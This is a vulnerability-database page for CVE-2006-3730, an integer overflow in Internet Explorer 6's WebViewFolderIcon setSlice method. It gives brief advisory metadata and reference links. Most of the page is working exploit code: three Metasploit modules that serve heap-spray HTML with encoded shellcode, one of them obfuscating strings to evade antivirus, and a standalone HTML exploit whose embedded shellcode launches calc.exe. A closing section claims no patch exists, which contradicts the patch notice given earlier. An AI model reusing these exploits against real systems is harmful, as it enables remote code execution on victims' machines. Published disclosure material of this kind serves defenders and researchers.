CVE-2006-3730
CVSS 9.3
Published: 2006-07-21 10:03:00
Last modified: 2017-07-19 21:32:32

[Original] Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy.


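[CNNVD] Microsoft IE WebViewFolderIcon Remote Integer Overflow Vulnerability (MS06-057) (CNNVD-200607-346)

        Internet Explorer is a very popular web browser released by Microsoft.
        Internet Explorer has an integer overflow vulnerability in the way it handles malformed ActiveX object invocations; a remote attacker may exploit it to crash the browser or execute arbitrary instructions.
        If an attacker can pass a 0x7fffffff argument to the setSlice method of the WebViewFolderIcon control, the browser may crash or execute arbitrary instructions.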

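- CVSS (Base Score)

CVSS score: 9.3 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CWE (Weakness Category)

CWE-94 [Improper Control of Generation of Code (Code Injection)]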

- CPE (Affected Platforms and Products)

cpe:/a:microsoft:ie:6.0  Microsoft Internet Explorer 6.0
cpe:/a:microsoft:ie:6.0:sp1

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:339  Windows Shell Remote Code Execution Vulnerability
oval:gov.nist.fdcc.patch:def:791  MS06-057: Vulnerability in Windows Explorer Could Allow Remote Execution (923191)
oval:gov.nist.USGCB.patch:def:791  MS06-057: Vulnerability in Windows Explorer Could Allow Remote Execution (923191)
*OVAL describes in detail how to detect this vulnerability; the related OVAL definitions give further technical detail on detecting it.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3730
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3730
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-346
(Official data source) CNNVD

- Other Links and Resources

http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html
(UNKNOWN)  MISC  http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html
http://isc.sans.org/diary.php?storyid=1742
(UNKNOWN)  MISC  http://isc.sans.org/diary.php?storyid=1742
http://milw0rm.com/exploits/2440
(UNKNOWN)  MILW0RM  2440
http://riosec.com/msie-setslice-vuln
(UNKNOWN)  MISC  http://riosec.com/msie-setslice-vuln
http://securitytracker.com/id?1016941
(UNKNOWN)  SECTRACK  1016941
http://www.kb.cert.org/vuls/id/753044
(UNKNOWN)  CERT-VN  VU#753044
http://www.microsoft.com/technet/security/Bulletin/MS06-057.mspx
(UNKNOWN)  MS  MS06-057
http://www.securityfocus.com/archive/1/archive/1/447174/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060927 Exploit module available for WebViewFolderIcon setSlice 0-day
http://www.securityfocus.com/archive/1/archive/1/447383/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060929 Determina zero-day fix for CVE-2006-3730 (WebViewFolderIcon setSlice Integer Overflow)
http://www.securityfocus.com/archive/1/archive/1/447426/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060930 setSlice exploited in the wild - massively
http://www.securityfocus.com/archive/1/archive/1/447490/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060930 ZERT patch for setSlice()
http://www.securityfocus.com/archive/1/archive/1/449179/100/0/threaded
(UNKNOWN)  HP  HPSBST02161
http://www.securityfocus.com/bid/19030
(UNKNOWN)  BID  19030
http://www.us-cert.gov/cas/techalerts/TA06-270A.html
(UNKNOWN)  CERT  TA06-270A
http://www.us-cert.gov/cas/techalerts/TA06-283A.html
(UNKNOWN)  CERT  TA06-283A
http://www.vupen.com/english/advisories/2006/2882
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2882
https://exchange.xforce.ibmcloud.com/vulnerabilities/27804
(UNKNOWN)  XF  ie-webviewfoldericon-dos(27804)

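- Vulnerability Information

Microsoft IE WebViewFolderIcon Remote Integer Overflow Vulnerability (MS06-057)
High risk  Code injection
2006-07-21 00:00:00 2009-09-10 00:00:00
Remote
        Internet Explorer is a very popular web browser released by Microsoft.
        Internet Explorer has an integer overflow vulnerability in the way it handles malformed ActiveX object invocations; a remote attacker may exploit it to crash the browser or execute arbitrary instructions.
        If an attacker can pass a 0x7fffffff argument to the setSlice method of the WebViewFolderIcon control, the browser may crash or execute arbitrary instructions.

- Advisory and Patch

        The vendor has released an upgrade patch that fixes this security issue. Patch download link:
        http://www.microsoft.com/technet/security/bulletin/ms06-057.mspx?pf=true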

- Vulnerability Information (2440)

MS Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit (EDBID:2440)
windows remote
2006-09-27 Verified
0 H D Moore
N/A
# This module is part of the metasploit framework3 
# svn co http://metasploit.com/svn/framework3/trunk/

require 'msf/core'

module Msf

class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote

	include Exploit::Remote::HttpServer::Html

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
			'Description'    => %q{
				This module exploits a flaw in the WebViewFolderIcon ActiveX control
			included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
			during the Month of Browser Bugs project (MoBB #18).
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'hdm', 
				],
			'Version'        => '$Revision: 3783 $',
			'References'     => 
				[
					[ 'OSVDB', '27110' ],
					[ 'BID', '19030' ],
					[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
	
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
				],
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end
	
	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		
		# Get a unicode friendly version of the return address
		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

		# Randomize the javascript variable names	
		var_buffer    = Rex::Text.rand_text_alpha(rand(30)+2)
		var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
		var_unescape  = Rex::Text.rand_text_alpha(rand(30)+2)
		var_x         = Rex::Text.rand_text_alpha(rand(30)+2)
		var_i         = Rex::Text.rand_text_alpha(rand(30)+2)
		var_tic       = Rex::Text.rand_text_alpha(rand(30)+2)
		var_toc       = Rex::Text.rand_text_alpha(rand(30)+2)
		
		# Randomize HTML data
		html          = Rex::Text.rand_text_alpha(rand(30)+2)
		
		# Build out the message
		content = %Q|
<html>
<head>
	<script>
	try {
	
	var #{var_unescape}  = unescape ;
	var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
	
	var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
	while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;

	var #{var_x} = new Array() ;	
	for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {
		#{var_x}[ #{var_i} ] = 
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + 
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + 		
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
	}
	
	
   	for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
		var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );	
		try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
		var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
	}
	
	} catch( e ) { window.location = 'about:blank' ; }
	
	</script>
</head>
<body>
#{html}
</body>
</html>		
		|

		# Randomize the whitespace in the document
		content.gsub!(/\s+/) do |s|
			len = rand(100)+2
			set = "\x09\x20\x0d\x0a"
			buf = ''
			
			while (buf.length < len)
				buf << set[rand(set.length)].chr
			end
			
			buf
		end
		
		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response(cli, content)
	end

end

end

# milw0rm.com [2006-09-27]
		

- Vulnerability Information (2448)

MS Internet Explorer WebViewFolderIcon setSlice() Exploit (html) (EDBID:2448)
windows remote
2006-09-28 Verified
0 jamikazu
N/A
<!--

..::[ jamikazu presents ]::..

Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2

Author: jamikazu 
Mail: jamikazu@gmail.com

Bug discovered by Computer H D Moore (http://www.metasploit.com)

Credit: metasploit, SkyLined

invokes calc.exe if successful 

-->

<HTML>
<BODY>
<SCRIPT language="javascript">

	var heapSprayToAddress = 0x05050505;
	var payLoadCode = unescape(
	"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
	"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
	"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
	"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
	"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
	"%uFF57%u63E7%u6C61%u0063");
	var heapBlockSize = 0x400000;
	var payLoadSize = payLoadCode.length * 2;
	var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
	var spraySlide = unescape("%u0505%u0505");
	spraySlide = getSpraySlide(spraySlide,spraySlideSize);
	heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
	memory = new Array();

	for (i=0;i<heapBlocks;i++)
	{
		memory[i] = spraySlide + payLoadCode;
	}

   	for ( i = 0 ; i < 128 ; i++) 
	{
		try{ 
			var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
			tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 ); 
		}catch(e){}
	}

	function getSpraySlide(spraySlide, spraySlideSize)
	{
		while (spraySlide.length*2<spraySlideSize)
		{
			spraySlide += spraySlide;
		}
		spraySlide = spraySlide.substring(0,spraySlideSize/2);
		return spraySlide;
	}

</SCRIPT> 

</BODY>
</HTML>

# milw0rm.com [2006-09-28]
		

- Vulnerability Information (16564)

Internet Explorer WebViewFolderIcon setSlice() Overflow (EDBID:16564)
windows remote
2010-07-03 Verified
0 metasploit
N/A
##
# $Id: ms06_057_webview_setslice.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
			'Description'    => %q{
				This module exploits a flaw in the WebViewFolderIcon ActiveX control
			included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
			during the Month of Browser Bugs project (MoBB #18).
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm',
				],
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '2006-3730'],
					[ 'OSVDB', '27110' ],
					[ 'MSB', 'MS06-057'],
					[ 'BID', '19030' ],
					[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",

				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jul 17 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Get a unicode friendly version of the return address
		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

		# Randomize the javascript variable names
		var_buffer    = rand_text_alpha(rand(30)+2)
		var_shellcode = rand_text_alpha(rand(30)+2)
		var_unescape  = rand_text_alpha(rand(30)+2)
		var_x         = rand_text_alpha(rand(30)+2)
		var_i         = rand_text_alpha(rand(30)+2)
		var_tic       = rand_text_alpha(rand(30)+2)
		var_toc       = rand_text_alpha(rand(30)+2)

		# Annoying AVs
		var_aname     = "==QMu42bjlkclRGbvZ0dllmViV2Vu42bjlkclRGbvZ0dllmViV2V".reverse.unpack("m*")[0]
		var_ameth     = "=U2Ypx2U0V2c".reverse.unpack("m*")[0]

		# Randomize HTML data
		html          = rand_text_alpha(rand(30)+2)


		# Build out the message
		content = %Q|
<html>
<head>
	<script>
	try {

	var #{var_unescape}  = unescape ;
	var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;

	var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
	while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;

	var #{var_x} = new Array() ;
	for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
		#{var_x}[ #{var_i} ] =
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
	}


	for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
		var #{var_tic} = new ActiveXObject( '#{var_aname}' );
		try { #{var_tic}.#{var_ameth}( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
		var #{var_toc} = new ActiveXObject( '#{var_aname}' );
	}

	} catch( e ) { window.location = 'about:blank' ; }

	</script>
</head>
<body>
#{html}
</body>
</html>
		|

		content = Rex::Text.randomize_space(content)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- Vulnerability Information (F83190)

Internet Explorer WebViewFolderIcon setSlice() Overflow (PacketStormID:F83190)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,activex
windows,2k,xp
CVE-2006-3730

This Metasploit module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
			'Description'    => %q{
				This module exploits a flaw in the WebViewFolderIcon ActiveX control
			included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
			during the Month of Browser Bugs project (MoBB #18).
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'hdm', 
				],
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2006-3730'],
					[ 'OSVDB', '27110' ],
					[ 'MSB', 'MS06-057'], 
					[ 'BID', '19030' ],
					[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
	
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
				],
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		
		# Get a unicode friendly version of the return address
		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

		# Randomize the javascript variable names	
		var_buffer    = rand_text_alpha(rand(30)+2)
		var_shellcode = rand_text_alpha(rand(30)+2)
		var_unescape  = rand_text_alpha(rand(30)+2)
		var_x         = rand_text_alpha(rand(30)+2)
		var_i         = rand_text_alpha(rand(30)+2)
		var_tic       = rand_text_alpha(rand(30)+2)
		var_toc       = rand_text_alpha(rand(30)+2)
		
		# Randomize HTML data
		html          = rand_text_alpha(rand(30)+2)
		
		# Build out the message
		content = %Q|
<html>
<head>
	<script>
	try {
	
	var #{var_unescape}  = unescape ;
	var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
	
	var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
	while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;

	var #{var_x} = new Array() ;	
	for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
		#{var_x}[ #{var_i} ] = 		
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
	}
	
	
   	for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
		var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );	
		try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
		var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
	}
	
	} catch( e ) { window.location = 'about:blank' ; }
	
	</script>
</head>
<body>
#{html}
</body>
</html>		
		|

		content = Rex::Text.randomize_space(content)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- Vulnerability Information

27110
Microsoft IE WebViewFolderIcon setSlice Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability Solution Unknown
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability Description

Internet Explorer contains a flaw that may allow a remote denial of service. The issue is triggered when calling the 'setSlice' method of the WebViewFolderIcon.WebViewFolderIcon.1 ActiveX object with the first parameter set to 0x7fffffff. This causes an invalid memory copy and may result in arbitrary code execution and/or a loss of availability for the browser.

- Timeline

2006-07-17 Unknown
2006-07-17 2006-10-10

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
